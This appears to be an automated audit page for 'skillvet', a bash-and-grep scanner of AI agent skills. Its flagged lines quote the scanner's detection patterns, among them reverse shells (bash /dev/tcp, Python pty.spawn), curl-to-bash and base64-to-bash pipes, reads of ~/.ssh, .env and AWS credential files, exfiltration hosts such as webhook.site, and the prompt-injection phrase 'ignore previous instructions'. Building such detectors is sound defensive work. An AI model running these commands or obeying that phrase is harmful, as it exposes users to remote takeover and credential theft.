skillvet
Scans and audits AI agent skills for security vulnerabilities, ensuring safe installations and protecting against malware and attacks.
Security score
The skillvet skill was audited on Feb 21, 2026 and we found 25 security issues across 6 threat categories, including 7 critical. Review the findings below before installing.
Security Issues
Direct command execution function call
| 165 | | 42 | Python reverse shell | `socket.connect` + `dup2`, `pty.spawn('/bin/bash')` | |
Template literal with variable interpolation in command context
| 125 | | 2 | Bulk env variable harvesting | `printenv \|`, `${!*@}` | |
Piping content to bash shell
| 144 | | 21 | Pipe-to-shell | `curl \| bash` (HTTP and HTTPS) | |
Piping content to bash shell
| 152 | | 29 | Base64 pipe-to-interpreter | `echo '...' \| base64 -D \| bash` — primary macOS vector | |
Piping content to bash shell
| 163 | | 40 | Bash /dev/tcp reverse shell | `bash -i >/dev/tcp/IP/PORT 0>&1` (AuthTool pattern) | |
Piping content to bash shell
| 169 | | 46 | GitHub raw content execution | `curl raw.githubusercontent.com/... \| bash` | |
Node child_process module reference
| 178 | | W2 | Subprocess execution | child_process, execSync, spawn, subprocess | |
Webhook reference - potential data exfiltration
| 124 | | 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin | |
Ngrok tunnel reference
| 124 | | 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin | |
Access to hidden dotfiles in home directory
| 128 | | 5 | Path traversal / sensitive files | `../../`, `~/.ssh`, `~/.clawdbot` | |
Access to AWS credentials directory
| 167 | | 44 | Credential file access | Direct reads of `.env`, `.pem`, `.aws/credentials` | |
Access to .env file
| 131 | | 8 | .env file theft | dotenv loading in scripts (not docs) | |
Access to .env file
| 138 | | 15 | Shipped .env files | .env files (not .example) in the skill | |
Access to .env file
| 167 | | 44 | Credential file access | Direct reads of `.env`, `.pem`, `.aws/credentials` | |
Access to .env file
| 187 | `.md`, `.js`, `.ts`, `.tsx`, `.jsx`, `.py`, `.sh`, `.bash`, `.rs`, `.go`, `.rb`, `.c`, `.cpp`, `.json`, `.yaml`, `.yml`, `.toml`, `.txt`, `.env*`, `Dockerfile*`, `Makefile`, `pom.xml`, `.gradle`. |
Base64 decode operation
| 127 | | 4 | Code obfuscation | base64 decode, hex escapes, dynamic code generation | |
Base64 decode operation
| 170 | | 47 | Echo-encoded payloads | Long base64 strings echoed and piped to decoders | |
Character code construction - potential obfuscation
| 145 | | 22 | String construction evasion | String.fromCharCode, getattr, dynamic call assembly | |
Prompt injection: ignore instructions
| 132 | | 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md | |
External URL reference
| 12 | Security scanner for agent skills. 48 critical checks, 8 warning checks. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, campaign signatures from [Koi Security](http |
External URL reference
| 97 | const url = "https://bit.ly/legit-link"; // skillvet-ignore |
External URL reference
| 159 | | 36 | Suspicious package sources | `pip install git+https://...`, npm from non-official registries | |
External URL reference
| 198 | - [Koi Security report](https://www.koi.ai/blog/clawhavoc-341-malicious-clawedbot-skills-found-by-the-bot-they-were-targeting) (Feb 2026) |
External URL reference
| 199 | - [The Hacker News coverage](https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html) |
External URL reference
| 200 | - [OpenSourceMalware analysis](https://opensourcemalware.com/blog/clawdbot-skills-ganked-your-crypto) |